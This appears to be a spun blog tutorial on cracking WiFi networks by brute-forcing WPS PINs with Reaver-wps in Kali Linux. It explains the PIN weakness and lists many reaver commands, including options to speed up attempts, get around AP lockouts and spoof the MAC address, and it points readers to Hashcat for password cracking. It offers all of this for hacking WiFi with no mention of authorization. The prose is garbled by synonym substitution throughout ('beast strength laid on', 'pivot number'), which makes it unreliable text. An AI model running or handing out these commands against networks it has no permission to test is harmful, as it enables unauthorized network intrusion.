Reaver-wps performs a beast strength laid on against an access point’s WiFi Protected Setup pivot number. 
While Reaver-wps does non back upwards reconfiguring the AP, this tin hold upwards accomplished amongst wpa_supplicant i time the WPS pivot is known.
Readers, depository fiscal establishment annotation that I’ve since written about other postal service where I could crack a password inward 14.21 seconds. using pyrit cowpatty too WiFite combination laid on amongst dictionary.The whole procedure takes less than 10 minutes.
Those who would similar to seek to a greater extent than ways of corking Wifi WPA WPA2 passwords, you lot tin equally good job HashCat or cudaHashcat or oclHashcat to scissure your unknown Wifi WPA WPA2 passwords. The practise goodness of using Hashcat is, you lot tin practise your ain dominion to check a designing too practise a Brute-force attack. This is an alternative to using lexicon laid on where lexicon tin incorporate only surely amount of words but a brute-force laid on volition allow you lot to essay every possible combinations of given charsets. Hashcat tin scissure Wifi WPA/WPA2 passwords too you lot tin equally good job it to scissure MD5, phpBB, MySQL too SHA1 passwords. Using Hashcat is an expert choice equally if you lot tin approximate 1 or 2 characters inward a password, it only takes few minutes. For example: if you lot know iii characters inward a password, it takes 12 minutes to scissure it. If you lot know iv characters inward a password, it takes iii minutes. You tin brand rules to only seek letters too numbers to scissure a completely unknown password if you lot know a surely Router’s default password contains only those. Possibilities of corking is a lot higher inward this way.
Important Note: Many users seek to capture amongst network cards that are non supported. You should buy a bill of fare that supports Kali Linux including injection too monitor way etc. H5N1 listing tin hold upwards flora inward 802.11 Recommended USB Wireless Cards for Kali Linux. It is rattling of import that you lot have got a supported card, otherwise you’ll hold upwards exactly wasting fourth dimension too elbow grease on something that exactly won’t practise the job.
Description:
Reaver-wps targets the external registrar functionality mandated yesteryear the WiFi Protected Setup specification. Access points volition render authenticated registrars amongst their electrical flow wireless configuration (including the WPA PSK), too equally good bring a novel configuration from the registrar.
In gild to authenticate equally a registrar, the registrar must show its noesis of the AP’s 8-digit pivot number. Registrars may authenticate themselves to an AP at whatever fourth dimension without whatever user interaction. Because the WPS protocol is conducted over EAP, the registrar ask only hold upwards associated amongst the AP too does non ask whatever prior noesis of the wireless encryption or configuration.
Reaver-wps performs a beast strength laid on against the AP, attempting every possible combination inward gild to approximate the AP’s 8 digit pivot number. Since the pivot numbers are all numeric, at that spot are 10^8 (100,000,000) possible values for whatever given pivot number. However, because the concluding digit of the pivot is a checksum value which tin hold upwards calculated based on the previous seven digits, that substitution infinite is reduced to 10^7 (10,000,000) possible values.
The substitution infinite is reduced fifty-fifty farther due to the fact that the WPS authentication protocol cuts the pivot inward one-half too validates each one-half individually. That way that at that spot are 10^4 (10,000) possible values for the origin one-half of the pivot too 10^3 (1,000) possible values for the 2nd one-half of the pin, amongst the concluding digit of the pivot beingness a checksum.
Reaver-wps beast forces the origin one-half of the pivot too thence the 2nd one-half of the pin, important that the entire substitution infinite for the WPS pivot break tin hold upwards exhausted inward 11,000 attempts. The speed at which Reaver tin essay pivot numbers is alone express yesteryear the speed at which the AP tin procedure WPS requests. Some APs are fast plenty that i pivot tin hold upwards tested every second; others are slower too only allow i pivot every 10 seconds. Statistically, it volition only bring one-half of that fourth dimension inward gild to approximate the right pivot number.
Installation:
Install Kali Linux, everything built into it. (Reaver-wps, libpcap too libsqlite3)
Usage:
Usually, the only required arguments to Reaver-wps are the interface cite too the BSSID of the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05
The channel too SSID (provided that the SSID is non cloaked) of the target AP volition hold upwards automatically identified yesteryear Reaver-wps, unless explicitly specified on the ascendence line:
# reaver -i mon0 -b 00:01:02:03:04:05 -c eleven -e linksys
By default, if the AP switches channels, Reaver-wps volition equally good alter its channel accordingly. However, this characteristic may hold upwards disabled yesteryear fixing the interface’s channel:
# reaver -i mon0 -b 00:01:02:03:04:05 --fixed
The default have timeout menstruation is 5 seconds. This timeout menstruation tin hold upwards laid manually if necessary (minimum timeout menstruation is 1 second):
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
The default delay menstruation betwixt pivot attempts is 1 second. This value tin hold upwards increased or decreased to whatever non-negative integer value. H5N1 value of nix way no delay:
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
Some APs volition temporarily lock their WPS state, typically for 5 minutes or less, when “suspicious” activity is detected. By default when a locked nation is detected, Reaver-wps volition depository fiscal establishment check the nation every 315 seconds (5 minutes too fifteen seconds) too non proceed beast forcing pins until the WPS nation is unlocked. This depository fiscal establishment check tin hold upwards increased or decreased to whatever non-negative integer value:
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
For additional output, the verbose choice may hold upwards provided. Providing the verbose choice twice volition increment verbosity too display each pivot break equally it is attempted:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
The default timeout menstruation for receiving the M5 too M7 WPS answer messages is .1 seconds. This timeout menstruation tin hold upwards laid manually if necessary (max timeout menstruation is 1 second):
# reaver -i mon0 -b 00:01:02:03:04:05 -T .5
Some pitiful WPS implementations volition driblet a connector on the flooring when an invalid pivot is supplied instead of responding amongst a NACK message equally the specs dictate. To occupation organisation human relationship for this, if an M5/M7 timeout is reached, it is treated the same equally a NACK yesteryear default. However, if it is known that the target AP sends NACKS (most do), this characteristic tin hold upwards disabled to ensure meliorate reliability. This choice is largely useless equally Reaver-wps volition auto-detect if an AP properly responds amongst NACKs or not:
# reaver -i mon0 -b 00:01:02:03:04:05 --nack
While most APs don’t care, sending an EAP FAIL message to unopen out a WPS session is sometimes necessary. By default this characteristic is disabled, but tin hold upwards enabled for those APs that ask it:
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
When 10 consecutive unexpected WPS errors are encountered, a alarm message volition hold upwards displayed. Since this may hold upwards a sign that the AP is charge per unit of measurement limiting pivot attempts or only beingness overloaded, a slumber tin hold upwards set inward house that volition hap whenever these alarm messages appear:
# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
More on Basic Usages
First, brand surely your wireless bill of fare is inward monitor mode:
# airmon-ng start wlan0
To run Reaver, you lot must specify the BSSID of the target AP too the cite of the monitor way interface (usually ‘mon0’, non ‘wlan0’, although this volition vary based on your wireless card/drivers):
# reaver -i mon0 -b 00:01:02:03:04:05
You volition in all probability equally good desire to job -vv to boot the bucket verbose information virtually Reaver’s progress:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv
Speeding Up the Attack
By default, Reaver-wps has a 1 2nd delay betwixt pivot attempts. You tin disable this delay yesteryear adding ‘-d 0’ on the ascendence line, but about APs may non similar it:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0
Another choice that tin speed upwards an laid on is –dh-small. This choice instructs Reaver to job modest diffie-hellman hush-hush numbers inward gild to cut the computational charge on the target AP:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
MAC Spoofing
In about cases you lot may want/need to spoof your MAC address. Reaver supports MAC spoofing amongst the –mac option, but you lot must ensure that you lot have got spoofed your MAC correctly inward gild for it to work.
Changing the MAC address of the virtual monitor way interface (typically named mon0) WILL NOT WORK. You must alter the MAC address of your wireless card’s physical interface. For example:
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 00:BA:AD:BE:EF:69
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --mac=00:BA:AD:BE:EF:69
Supported Wireless Drivers
The next wireless drivers have got been tested or reported to piece of work successfully amongst Reaver-wps:
ath9k
rtl8187
carl19170
ipw2000
rt2800pci
rt73usb
Partially Supported
The next wireless drivers have got had mixed success, too may or may non piece of work depending on your wireless bill of fare (i.e., if you lot are having problems amongst these drivers/cards, consider trying a novel bill of fare earlier submitting a problem ticket):
ath5k
iwlagn
rtl2800usb (using the latest compat-wireless drivers has fixed many user's problems, hint hint...)
b43
Not Supported
The next wireless drivers/cards have got been tested or reported to non piece of work properly amongst Reaver:
iwl4965
RT3070L
Netgear WG111v3
Conclusion
If you lot desire to Pentest or Hack your Wifi Passwords, thence the origin matter you lot ask is a compatible Wifi card. Most Wifi cards are priced betwixt 15$-35$ USD.I consider no signal struggling amongst an unsupported bill of fare when you lot tin exactly invest that extra bucks too that bill of fare volition concluding you lot years. You boot the bucket to larn how to pentest or hack Wifi passwords, how to Inject, spoof, setup faux AP or Honeypot. See the listing of supported USB Wifi adapter cards that plant inward Kali Linux too are available inward Amazon.
Related post: Speed upwards WPA/WPA2 corking amongst Pyrit too CUDA too leveraging Wifite [This postal service is forthwith replaced too updated yesteryear the side yesteryear side i below]
Cracking Wifi WPA/WPA2 passwords using pyrit cowpatty inward Kali Linux
